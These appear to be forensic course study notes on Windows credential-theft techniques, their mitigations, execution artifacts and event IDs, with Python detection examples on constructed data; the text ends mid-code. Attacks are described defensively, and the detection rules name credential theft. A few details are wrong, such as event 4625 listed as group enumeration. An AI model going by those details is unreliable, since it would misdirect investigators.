
Day 2 FOR508.2


Evolution of Credential Attack Mitigations in Windows


PtH is limited to NTLM


Introduced across Windows 7 / 2008 R2 → Windows 8 / 2012 R2 → Windows 10 (listed in order of introduction):
  • User Access Control (UAC)
    prevents "hidden" program launches
  • Managed Service Accounts
    service accounts with domain admin rights to combat ticket abuse (long and complex passwords, renewed every 30 days)
  • KB2871997
    backported many Windows 8 protections to Windows 7
  • No caching for CredSSP and other SSO
  • Local admin remote logon restrictions
  • Protected Process
    can only load signed code
  • RDP /restrictedAdmin
    no credentials/hash over the wire
  • Domain Protected Users Group
    cannot log on using weak authentication
  • Improved cleanup
    after termination of user session
  • Group Managed Service Accounts
    complex passwords, renewed after a minimum of 30 days
  • Credential Guard
    isolates hashes and tickets behind a security boundary using virtualization
  • Remote Credential Guard
    protects any account during RDP
  • Device Guard
    application whitelisting to prevent untrusted code from being executed


Credential Availability



Connection method | Logon type (number) | Reusable creds in LSASS | Notes
Log on at console | Interactive (2) | yes | Includes hardware remote access / lights-out cards and network KVMs.
RUNAS | Interactive (2) | yes |
RUNAS /NETWORK | NewCredentials (9) | yes | Clones current LSA session for local access, but uses new credentials when connecting to network resources.
Remote Desktop (success) | RemoteInteractive (10) | yes | If the remote desktop client is configured to share local devices and resources, those may be compromised as well.
Remote Desktop (failure - logon type was denied) | RemoteInteractive (10) | - | By default, if RDP logon fails credentials are only stored very briefly. This may not be the case if the computer is compromised.
Net use * \\SERVER | Network (3) | - |
Net use * \\SERVER /u:user | Network (3) | - |
MMC snap-ins to remote computer | Network (3) | - | Example: Computer Management, Event Viewer, Device Manager, Services
PowerShell WinRM | Network (3) | - | Example: Enter-PSSession server
PowerShell WinRM with CredSSP | NetworkClearText (8) | yes | Example: New-PSSession server -Authentication Credssp -Credential cred
PsExec without explicit creds | Network (3) | - | Example: PsExec \\server cmd
PsExec with explicit creds | Network + Interactive (3 + 2) | yes | Example: PsExec \\server -u user -p pwd cmd. Creates multiple logon sessions.
Remote Registry | Network (3) | - |
Remote Desktop Gateway | Network (3) | - | Authenticating to Remote Desktop Gateway.
Scheduled task | Batch (4) | yes | Password will also be saved as LSA secret on disk.
Run tools as a service | Service (5) | yes | Password will also be saved as LSA secret on disk.
Vulnerability scanners | Network (3) | - | Most scanners default to using network logons, though some vendors may implement non-network logons and introduce more credential theft risk.
IIS "Basic Authentication" | NetworkCleartext (8) on IIS 6.0+; Interactive (2) prior to IIS 6.0 | yes |
IIS "Integrated Windows Authentication" | Network (3) | - | NTLM and Kerberos providers.
https://docs.microsoft.com/de-de/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN


Hashes

Hashes are primarily used to obfuscate a secret that would otherwise be transmitted or stored in clear text.

Hashes are available in the LSASS process and can be extracted with admin privileges. Once dumped, hashes can be cracked or used immediately in a Pass the Hash attack.

Defences:

  • Prevent admin account compromise
  • Stop remote interactive sessions with highly privileged accounts
  • Proper termination of RDP sessions
  • Win8.1+ → force the use of Restricted Admin?
  • Win10 → deploy Remote Credential Guard
  • Upgrade to Windows 10
  • Credential Guard
  • TsPkg, WDigest, etc. -- SSO creds obsolescence
  • Domain Protected Users Group (PtH mitigation)

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

Tokens

The system uses an access token to identify the user when a thread interacts with a securable object or tries to perform a system task that requires privileges. 
The SeImpersonate privilege lets tokens be copied from processes. The new token can then be used to authenticate as the new user. A target user or service must be logged on or have running processes.

Defences:

• Prevent admin account compromise
• Stop remote interactive sessions with highly privileged accounts
• Proper termination of RDP sessions
• Win8.1+ →  force the use of Restricted Admin Mode?
• Win10 → deploy Remote Credential Guard
• Account designation of “Account is Sensitive and Cannot be Delegated” in Active Directory
• Domain Protected Users security group accounts do not create delegate tokens


Cached Credentials (SAM.dat)

Stored domain credentials to allow logons when domain controller access is unavailable. Most systems cache the last 10 logon hashes by default. (SAM.dat)

Cached credentials must be cracked. The hashes are salted and case-sensitive, which makes cracking very slow. They cannot be used for Pass the Hash attacks.

Defences:

• Prevent admin account compromise
• Limit number of cached logon accounts
• SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (cachedlogonscount value)
• A cachedlogonscount of zero or one is not always the right answer
• Enforce password length and complexity rules
• Brute force cracking is required for this attack
• Domain Protected Users security group accounts do not cache credentials


LSA Secrets

Credentials stored in the registry (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets) to allow services or tasks to be run with user privileges. In addition to service accounts, they may also hold application passwords such as VPN or auto-logon credentials.

Defences:

• Prevent admin account compromise
• Do not employ services or schedule tasks requiring privileged accounts on low trust systems
• Reduce number of services that require domain accounts to execute
• Heavily audit any accounts that must be used
• (Group) Managed Service Accounts


Tickets (Kerberos)

Kerberos issues tickets to authenticated users that can be reused without additional authentication. Tickets are cached in memory and are valid for 10 hours.

Defences:

• Credential Guard (Win10+)
• Domain Protected Users Group (Win8+) – Some attacks
• Remote Credential Guard (Win10+)
• Restricted Admin (Win8+)
• Long & complex passwords on service accounts (to prevent Kerberoasting)
• Change service account passwords regularly
• Group Managed Service Accounts are a great mitigation
• Audit service accounts for unusual activity
• Change KRBTGT password regularly (yearly) CHANGE NEEDS TO BE DONE TWICE TO BE EFFECTIVE

Mitigations:

Attack | Description | Mitigation
Pass the Ticket | Steal ticket from memory and pass or import on other systems | Credential Guard; Remote Credential Guard
Overpass the Hash | Use NT hash to request a service ticket for the same account | Credential Guard; Protected Users Group; Disable RC4 (any weak) authentication
Kerberoasting | Request service ticket for highly privileged service & crack NT hash | Long and complex service account passwords; Managed Service Accounts
Golden Ticket | Kerberos TGT for any account with no expiration. Survives full password reset | Protect domain admin accounts; Change KRBTGT password regularly
Silver Ticket | All-access pass for a single service or computer | Regular computer account password updates
Skeleton Key | Patch LSASS on domain controller to add backdoor password to any account | Protect domain admin accounts; Smart card usage for privileged accounts

(some) Detections

"Golden Ticket events may have one of these issues:
The Account Domain field is blank when it should be DOMAIN
The Account Domain field is DOMAIN FQDN when it should be DOMAIN."
–Sean Metcalf, adsecurity.org

Kerberoasting uses RC4 encryption downgrade (Ticket Enc. Type = 0x17)

See the FIRST paper linked above, page 35 onward.
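The two detection ideas above (RC4 downgrade on 4769 service-ticket requests, and a blank or FQDN Account Domain on 4624) as runnable checks. This is an added example, not code from the notes, the FIRST paper or adsecurity.org; the event records are constructed, and the field names (TargetUserName, ServiceName, TicketEncryptionType, TargetDomainName) follow the Security log XML layout.

```python
# Added example (not from the notes or adsecurity.org): detection logic for the
# two Kerberos indicators above, run over constructed Security-log records.
from collections import Counter

RC4_HMAC = 0x17            # Ticket Encryption Type the notes flag as a Kerberoasting downgrade
EXPECTED_DOMAIN = "CORP"   # constructed NetBIOS domain name; "CORP.LOCAL" would be its FQDN


def flag_rc4_service_tickets(events, roast_threshold=3):
    """4769 events: RC4 service tickets are the downgrade signal; one account
    requesting many user-owned SPNs in a burst is the Kerberoasting pattern.
    Returns (list of (requester, spn, ip), sorted list of likely roasting accounts)."""
    hits = []
    per_requester = Counter()
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        # krbtgt and computer accounts (name$) are noise for this rule; user-owned SPNs matter
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        hits.append((ev["TargetUserName"], svc, ev["IpAddress"]))
        per_requester[ev["TargetUserName"]] += 1
    roasters = sorted(acct for acct, n in per_requester.items() if n >= roast_threshold)
    return hits, roasters


def flag_golden_ticket_domain_fields(events, expected_domain=EXPECTED_DOMAIN):
    """4624 events: per the quoted observation, forged-TGT logons may show a blank
    Account Domain, or the FQDN where the short NetBIOS name is expected."""
    findings = []
    want = expected_domain.upper()
    for ev in events:
        if ev["EventID"] != 4624:
            continue
        dom = ev["TargetDomainName"].upper()
        if dom == "":
            findings.append((ev["TargetUserName"], "blank Account Domain"))
        elif dom.startswith(want + "."):
            findings.append((ev["TargetUserName"], f"FQDN Account Domain {ev['TargetDomainName']}"))
    return findings


# Constructed sample records: three RC4 service-ticket requests from jdoe in a
# row, one legitimate AES request, RC4 requests for krbtgt and a computer
# account (both ignored), and 4624 logons with suspicious Account Domain values.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_http", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.9"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.9"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.9"},
    {"EventID": 4624, "TargetUserName": "asmith", "TargetDomainName": "CORP"},
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": ""},
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "CORP.LOCAL"},
]

if __name__ == "__main__":
    hits, roasters = flag_rc4_service_tickets(SAMPLE_EVENTS)
    print("RC4 service tickets:", hits)
    print("likely Kerberoasting accounts:", roasters)
    print("golden-ticket domain anomalies:", flag_golden_ticket_domain_fields(SAMPLE_EVENTS))
```

On real data the 4769 field arrives as the hex string "0x17"; convert it with int(value, 16) before comparing. The roast threshold and the burst window are tuning knobs; a service account that legitimately still needs RC4 will show up in the hits list but not as a roaster unless it requests several SPNs.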

NTDS.DIT

Active Directory Domain Services (AD DS) database ( \Windows\NTDS\) holds all user and computer account hashes (LM/NT) in the domain. Encrypted, but algorithm is well known and easy to defeat.
The file is locked, so admin access is required to load a driver to access raw disk, or use the Volume Shadow Copy Service.

Defences:

Don’t allow Domain Admin accounts to be compromised.  LOL


Advanced Evidence of Execution



c:\Windows\Prefetch

Description:

• Increases performance of a system by pre-loading code pages of commonly used applications. Cache Manager monitors all files and directories referenced for each application or process and maps them into a .pf file.
Utilized to know an application was executed on a system.
• Limited to 128 files on Win7
• Limited to 1024 files on Win8-10
• (exename)-(hash).pf

limited to 128 files / check file date for first/last execution

The prefetch directory is populated after an application is executed.

Prefetch has historically been the go-to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which have still had prefetch enabled (particularly in businesses which push a standard image) so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, but the same applies.



The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled

Interpretation:
• Each .pf will include last time of execution, number of times run, and device and file handles used by the program
• Date/Time file by that name and path was first executed
- Creation Date of .pf file (-10 seconds)
• Date/Time file by that name and path was last executed
- Embedded last execution time of .pf file
- Last modification date of .pf file (-10 seconds)
- Win8-10 will contain last 8 times of execution
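The interpretation rules above, as a worked example added here (not code from the notes): decoding the EnablePrefetcher value, splitting the (exename)-(hash).pf name, and deriving first/last execution from the .pf timestamps with the 10-second offset. The directory listing is constructed; on a live system it would come from os.scandir over C:\Windows\Prefetch, and the per-OS file caps are the 128/1024 figures from the notes.

```python
# Added example (not from the notes): interpreting the prefetch settings and
# timestamps described above over a constructed directory listing.
import re
from datetime import datetime, timedelta, timezone

ENABLE_PREFETCHER = {
    0: "Disabled",
    1: "Only application launch prefetching enabled",
    2: "Only boot prefetching enabled",
    3: "Both application launch and boot prefetching enabled",
}
PF_LIMIT = {"win7": 128, "win8-10": 1024}     # maximum .pf files kept, per the notes
LAUNCH_OFFSET = timedelta(seconds=10)         # the .pf is written ~10 s after the launch
PF_NAME = re.compile(r"^(?P<exe>.+)-(?P<hash>[0-9A-F]{8})\.pf$", re.IGNORECASE)


def interpret_enableprefetcher(value):
    """Return (meaning, application_launch_tracing_on) for the registry DWORD.
    Only values 1 and 3 produce .pf files for application launches."""
    return ENABLE_PREFETCHER.get(value, f"Unknown value {value!r}"), value in (1, 3)


def parse_pf_name(filename):
    """Split '(exename)-(hash).pf' into (EXENAME, HASH); None for non-.pf files."""
    m = PF_NAME.match(filename)
    return (m.group("exe").upper(), m.group("hash").upper()) if m else None


def prefetch_execution_times(listing, os_family="win8-10"):
    """listing: iterable of (filename, created_utc, modified_utc).
    Returns ({EXENAME: [{hash, first_run, last_run}, ...]}, at_cap). The same
    exe name with different hashes means it ran from different paths;
    at_cap warns that the oldest .pf files may already have been evicted."""
    results = {}
    pf_count = 0
    for name, created, modified in listing:
        parsed = parse_pf_name(name)
        if parsed is None:
            continue                       # Layout.ini, AgAppLaunch.db, etc.
        pf_count += 1
        exe, h = parsed
        results.setdefault(exe, []).append({
            "hash": h,
            "first_run": created - LAUNCH_OFFSET,   # creation time - 10 s
            "last_run": modified - LAUNCH_OFFSET,   # last modification - 10 s
        })
    return results, pf_count >= PF_LIMIT[os_family]


# Constructed listing: cmd.exe launched from two different paths, one service
# binary, and a non-.pf file that must be skipped. Hashes are made up.
UTC = timezone.utc
SAMPLE_LISTING = [
    ("CMD.EXE-4A81B364.pf", datetime(2020, 1, 5, 10, 0, 10, tzinfo=UTC), datetime(2020, 2, 1, 9, 30, 10, tzinfo=UTC)),
    ("CMD.EXE-8E9C2B3A.pf", datetime(2020, 1, 20, 8, 0, 10, tzinfo=UTC), datetime(2020, 1, 20, 8, 0, 10, tzinfo=UTC)),
    ("PSEXESVC.EXE-AD7C4E3B.pf", datetime(2020, 1, 21, 2, 15, 10, tzinfo=UTC), datetime(2020, 1, 21, 2, 15, 10, tzinfo=UTC)),
    ("Layout.ini", datetime(2019, 12, 1, tzinfo=UTC), datetime(2020, 2, 1, tzinfo=UTC)),
]

if __name__ == "__main__":
    print(interpret_enableprefetcher(3))
    times, at_cap = prefetch_execution_times(SAMPLE_LISTING, "win7")
    for exe, runs in times.items():
        for r in runs:
            print(f"{exe} [{r['hash']}] first {r['first_run']:%Y-%m-%d %H:%M:%S} last {r['last_run']:%Y-%m-%d %H:%M:%S}")
    print("directory at cap:", at_cap)
```

The file-system timestamps give only the first and last run; the embedded run count and the last eight run times on Win8-10 require parsing the .pf body itself, which this example does not do.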

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache
Need to check for every control set found in the SYSTEM hive.

Description:
• Windows Application Compatibility Database is used by Windows to identify possible application compatibility challenges with executables.
• Tracks the executable's file name, file size and last modified time

Entry limits: Windows XP ShimCache is limited to 96 entries; Windows Server 2003 holds 512; Windows 7-10 and Server 2008/2012/2016 hold 1024.

The information is retained in memory and is only written to the registry when the system is shutdown. Data can be retrieved from a memory image if available.

The Shimcache tracks metadata such as the full file path, last modified date, and file size
The Shimcache only contains the information prior to the system’s last startup, as current entries are stored only in memory
Use Shimcache along with your timelines to recreate and determine malicious activities
Liears


Win7/8/10
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
Interpretation:
Any executable run on the Windows system could be found in this key. You can use this key to identify systems that specific malware was executed on. In addition, based on the interpretation of the time-based data, you might be able to determine the last time of execution or activity on the system.
• Windows 7/8/10 contains at most 1,024 entries
- LastUpdateTime does not exist on Win7/8/10 systems

AMCache / RecentFileCache

"installed and executed programs"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

C:\Windows\AppCompat\Programs\Amcache.hve (Windows 7/8/10)

Description:
ProgramDataUpdater (a task associated with the Application Experience Service) uses the registry file Amcache.hve to store data during process creation
Amcache.hve records the recent processes that were run 
Amcache.hve records the program's SHA1 so it can be researched in databases like VirusTotal for easy identification
Amcache.hve lists the path of the files that were executed, which can then be used to find the executed program

Interpretation:
• Amcache.hve – Keys = Amcache.hve\Root\File\{Volume GUID}\#######
• Entry for every executable run, full path information, File’s $StandardInfo Last Modification Time, and Disk volume the executable was run from
• First Run Time = Last Modification Time of Key
• SHA1 hash of executable also contained in the key

Jump Lists

"executed and used files on WIN7-10"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations (Win7/8/10)

Description:
• The Windows 7-10 task bar (Jump List) is engineered to allow users to "jump" to or access items they have frequently or recently used, quickly and easily. This functionality covers not only recent media files but also recent tasks.
• The data stored in the AutomaticDestinations folder will each have a unique file prepended with the AppID of the associated application.

Interpretation:
• First time of execution of application.
- Creation Time = First time item added to the AppID file.
• Last time of execution of application with file open.
- Modification Time = Last time item added to the AppID file.
• List of Jump List IDs → www.forensicswiki.org/wiki/List_of_Jump_List_IDs

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache. (Windows 2000, Windows XP, Windows Server 2003)
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache (Starting from Windows Vista)

Description:

Each time you start using a new application, the Windows operating system automatically extracts the application name from the version resource of the exe file and stores it for later use in a registry key known as the 'MuiCache'.

Stores information about what programs ran under a user account:
the user account an executable ran under and its executable file path.

UserAssist

"GUI-based programs executed from the desktop"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

NTUSER.DAT HIVE
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count

Description:
GUI-based programs launched from the desktop are tracked in the launcher on a Windows System.


Interpretation:
All values are ROT-13 Encoded
• GUID for Win7/8/10
- CEBFF5CD Executable File Execution
- F4E57C4B Shortcut File Execution
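Decoding one UserAssist Count value, as an added example (not code from the notes). The ROT-13 value names and the two GUID prefixes are from the notes; the 72-byte value layout for Windows 7 and later (run count at offset 4, last-run FILETIME at offset 60) is taken from public write-ups rather than from this page and is an assumption here, as is the full GUID used in the sample. The sample entry is constructed.

```python
# Added example (not from the notes): decoding a UserAssist entry. The value
# layout (offsets 4 and 60, 72 bytes) is an assumption from public write-ups.
import codecs
import struct
from datetime import datetime, timedelta, timezone

GUID_KINDS = {                       # prefixes as given in the notes
    "{CEBFF5CD": "Executable File Execution",
    "{F4E57C4B": "Shortcut File Execution",
}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
RUN_COUNT_OFFSET = 4
LAST_RUN_OFFSET = 60
VALUE_SIZE = 72


def filetime_to_datetime(ft):
    """FILETIME = 100 ns intervals since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of the above; used here only to build the constructed sample."""
    return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10


def decode_userassist(guid, value_name, data):
    """Return kind, decoded path, run count and last run time for one Count value."""
    if len(data) < VALUE_SIZE:
        raise ValueError(f"expected {VALUE_SIZE}-byte Windows 7+ value, got {len(data)}")
    kind = next((k for p, k in GUID_KINDS.items() if guid.upper().startswith(p)), "unknown")
    run_count = struct.unpack_from("<I", data, RUN_COUNT_OFFSET)[0]
    ft = struct.unpack_from("<Q", data, LAST_RUN_OFFSET)[0]
    return {
        "kind": kind,
        "path": codecs.decode(value_name, "rot13"),       # value names are ROT-13
        "run_count": run_count,
        "last_run": filetime_to_datetime(ft) if ft else None,   # 0 = not recorded
    }


def build_sample_value(run_count, last_run):
    """Construct a 72-byte value blob in the assumed layout (sample data only)."""
    return (struct.pack("<4I", 0, run_count, 0, 0)     # session, run count, focus count, focus time
            + bytes(40)                                 # ten floats, unused here
            + bytes(4)
            + struct.pack("<Q", datetime_to_filetime(last_run))
            + bytes(4))


# Constructed entry: cmd.exe run 5 times, last on 2019-03-01 12:00:00 UTC.
SAMPLE_GUID = "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
SAMPLE_NAME = "P:\\Jvaqbjf\\flfgrz32\\pzq.rkr"
SAMPLE_LAST_RUN = datetime(2019, 3, 1, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_DATA = build_sample_value(5, SAMPLE_LAST_RUN)

if __name__ == "__main__":
    print(decode_userassist(SAMPLE_GUID, SAMPLE_NAME, SAMPLE_DATA))
```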

NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps (Win10)

Description:
Program execution launched on the Win10 system is tracked in the RecentApps key

Interpretation:
Each GUID key points to a recent application.
AppID = Name of Application
LastAccessTime = Last execution time in UTC
LaunchCount = Number of times executed

BAM/DAM

"Background Application monitoring of executions on Win10"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

(Win10) SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}
(Win10) SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}

Description:
Windows Background Activity Moderator (BAM)

Investigative Notes
Provides full path of the executable file that was run on the system and last execution date/time


Event Logs


Forensic ID's

ID | Action
4624 | Successful logon
4625 | Unsuccessful logon; the error code gives the reason:
       0x6  invalid username
       0x7  requested server not found
       0xC  policy restriction
       0x12 account locked, disabled or expired
       0x17 password expired
       0x18 invalid password
       0x25 time sync issue
4634 | Successful logoff
4647 | Logoff initiated (better than 4634)
4648 | Logon using RunAs
4672 | Administrative logon
4720 | New account created
4722 | A user account was enabled
4724 | Attempt to reset an account's password
4728 | Member added to security-enabled global group
4732 | Member added to security-enabled local group
4735 | Security-enabled local group was changed
4738 | User account was changed
4756 | Member added to security-enabled universal group
4778 | RDP session reconnected
4779 | RDP session disconnected

Location

OS | Type | Default location | Registry holding location of file
NT / Win2000 / XP / Server 2003 | .evt | %systemroot%\System32\config | HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
  HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\System
  HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Security
Vista / Win7 / Win8 / 2008 / 2012 / Win10 / 2016 | .evtx | %systemroot%\System32\winevt\logs | HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
  HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\System
  HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Security

Logon Types

Type | Source | Description
2 | Interactive | A logon at the console of a computer, whether with a domain account or a local account from the computer's local SAM. To tell the difference, look for the domain or computer name preceding the user name in the event's description.
3 | Network | When accessing a computer from elsewhere on the network. Most commonly connections to shared folders or printers, and other over-the-network logons.
4 | Batch | Logon sessions created by Windows when it executes a scheduled task to run it under the authority of the specified user account. Other job scheduling systems may also generate type 4 logon events when starting jobs.
5 | Service | Similar to scheduled tasks, each service is configured to run as a specified user account. When a service starts, Windows first creates a logon session, which results in a type 5 logon event.
6 | n.a. |
7 | Unlock | When a user returns to their workstation and attempts to unlock the console from the password-protected screen saver mode, Windows treats this as a logon and logs the event as type 7.
8 | Network Cleartext | Indicates a network logon, like logon type 3, but where the password was sent over the network as clear text. Windows server doesn't allow connection to shared files or printers with clear text authentication. These logons can happen from within an ASP script using the ADVAPI or when a user logs on to IIS using IIS's basic authentication mode. In both cases the logon process in the event's description will list advapi.
9 | New Credentials | If you use the RunAs command to start a program under a different user account and specify the /netonly switch, Windows records a logon/logoff event with logon type 9.
10 | Remote Interactive | When you access a computer through Terminal Services, Remote Desktop or Remote Assistance, Windows logs the logon attempt with logon type 10. (Prior to XP, Windows 2000 doesn't use logon type 10 and Terminal Services logons are reported as logon type 2.)
11 | Cached Interactive | Cached logons facilitate mobile users. Windows caches a hash of the last 10 interactive domain logon credentials. Later, when you are not connected to your organization's network and attempt to log on to your laptop with a domain account and there's no domain controller available for verification, Windows uses these hashes to verify your identity.



Use the Logon ID to link a logon (4624) with its logoff (preferably 4647 over 4634) to determine the session length.

Workstation Logons are "Logon Events"
DC (i.e. Kerberos) verifications of credentials are " Account Logon Events"
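Linking 4624 to 4647/4634 by Logon ID, as an added example (not code from the notes). The records are constructed dicts named after the Security log XML fields (TargetLogonId, LogonType, TargetUserName, IpAddress); the logon type labels are the ones from the table above, and 4647 is preferred over 4634 as the session end marker.

```python
# Added example (not from the notes): pairing logon and logoff events by
# Logon ID to compute session length over constructed Security-log records.
from datetime import datetime, timezone

LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive", 11: "CachedInteractive",
}


def build_sessions(events):
    """Pair each 4624 with the matching 4647 (preferred) or 4634 by TargetLogonId.
    Sessions without either end marker are returned with end=None (still open)."""
    starts, ends = {}, {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        lid = ev["TargetLogonId"]
        if ev["EventID"] == 4624:
            starts.setdefault(lid, ev)          # first 4624 for an ID wins
        elif ev["EventID"] in (4647, 4634):
            prev = ends.get(lid)
            # a 4647 (user-initiated logoff) replaces a 4634 seen earlier; never the reverse
            if prev is None or (ev["EventID"] == 4647 and prev["EventID"] == 4634):
                ends[lid] = ev
    sessions = []
    for lid, s in starts.items():
        e = ends.get(lid)
        sessions.append({
            "logon_id": lid,
            "user": s["TargetUserName"],
            "source_ip": s.get("IpAddress", "-"),
            "logon_type": LOGON_TYPES.get(s["LogonType"], f"type {s['LogonType']}"),
            "start": s["TimeCreated"],
            "end": e["TimeCreated"] if e else None,
            "end_event": e["EventID"] if e else None,
            "duration": (e["TimeCreated"] - s["TimeCreated"]) if e else None,
        })
    return sessions


def _t(h, m, s=0):
    return datetime(2021, 6, 1, h, m, s, tzinfo=timezone.utc)


# Constructed records: an RDP session closed by 4647 (with a trailing 4634),
# a one-second network logon closed only by 4634, and a console logon still open.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": _t(9, 0), "TargetLogonId": "0x1A2B3C", "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "TimeCreated": _t(9, 5), "TargetLogonId": "0x2B3C4D", "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.20"},
    {"EventID": 4634, "TimeCreated": _t(9, 5, 1), "TargetLogonId": "0x2B3C4D"},
    {"EventID": 4647, "TimeCreated": _t(10, 30), "TargetLogonId": "0x1A2B3C"},
    {"EventID": 4634, "TimeCreated": _t(10, 30, 2), "TargetLogonId": "0x1A2B3C"},
    {"EventID": 4624, "TimeCreated": _t(12, 0), "TargetLogonId": "0x3C4D5E", "LogonType": 2, "TargetUserName": "admin"},
]

if __name__ == "__main__":
    for s in build_sessions(SAMPLE_EVENTS):
        print(s["logon_id"], s["user"], s["logon_type"], s["source_ip"], s["duration"] or "still open", s["end_event"])
```

Type 3 sessions that last a second or two are normal share traffic; the interesting ones are long type 10 sessions from unexpected source IPs and sessions with no logoff at all after the host is supposedly idle.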

Eventlog: tracking Reconnaissance

Tracking Account and Group enumeration

ID Action
4798 A user's local group membership was enumerated
4625 A security-enabled local group membership was enumerated

Check the process name within the event to unveil the program used

Eventlog: tracking Lateral Movement

Network Shares

ID Action
5140 A network share was accessed
5145 A shared object was accessed
Auditing of network shares must be enabled, and this event can be very noisy

RunAs

ID Action
4648 RunAs issued (mostly logged only at the source system)

Scheduled Tasks

ID Action
4698 Scheduled task created
4702 Scheduled task updated
4699 Scheduled task deleted
201 Scheduled task executed or completed
4701 Scheduled task enabled or disabled

Eventlog: Suspicious Services

Can be an indicator of persistence (service failure recovery, DLL hijacking, service replacement, etc.)

ID Action
7034 Service crashed unexpectedly
7035 Service sent a start/stop control
7036 Service started or stopped
7040 Start type has changed
7045 (Win2008R2+) A new service was installed
4697 A new service was installed (security.log)

EventLog cleaning

ID Action
1102 Audit log cleared (Security log)
104 Audit log cleared (System log)

Although log clearing is usually all-or-nothing, it may be worth evaluating selective manipulation like DanderSpritz

Mitigation:

  • Event log forwarding (e.g. Splunk)
  • Logging heartbeat
  • Log gap analysis
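The "logging heartbeat" and "log gap analysis" mitigations as a check over an event stream, added here as an example (not code from the notes). The records are constructed (timestamp, channel, event id) tuples; the heartbeat is a made-up scheduled task writing event 100 to the Application log every five minutes, standing in for whatever periodic trusted event an environment has.

```python
# Added example (not from the notes): detecting explicit log clears and silent
# gaps in a heartbeat over a constructed event stream.
from datetime import datetime, timedelta, timezone

CLEAR_EVENTS = {("Security", 1102), ("System", 104)}   # audit log cleared, per the notes
HEARTBEAT = ("Application", 100)                       # constructed heartbeat source
HEARTBEAT_INTERVAL = timedelta(minutes=5)


def find_clear_events(records):
    """Explicit clears are the easy case: the 1102/104 event itself survives the clear."""
    return [(ts, ch, eid) for ts, ch, eid in records if (ch, eid) in CLEAR_EVENTS]


def find_gaps(records, heartbeat=HEARTBEAT, interval=HEARTBEAT_INTERVAL, tolerance=1.5):
    """Silent gaps: two consecutive heartbeats more than tolerance*interval apart.
    This is what selective deletion or a forwarding outage looks like, since
    neither leaves a 1102/104 behind. Returns [(last_seen, next_seen, length)]."""
    beats = sorted(ts for ts, ch, eid in records if (ch, eid) == heartbeat)
    limit = interval * tolerance
    return [(a, b, b - a) for a, b in zip(beats, beats[1:]) if b - a > limit]


def _t(h, m):
    return datetime(2021, 6, 1, h, m, tzinfo=timezone.utc)


# Constructed stream: heartbeats 08:00-09:00 with 08:35/08:40/08:45 missing,
# a Security log clear at 08:52, plus an unrelated logon event that is ignored.
SAMPLE_RECORDS = [(_t(8, m), *HEARTBEAT) for m in range(0, 60, 5) if m not in (35, 40, 45)]
SAMPLE_RECORDS += [
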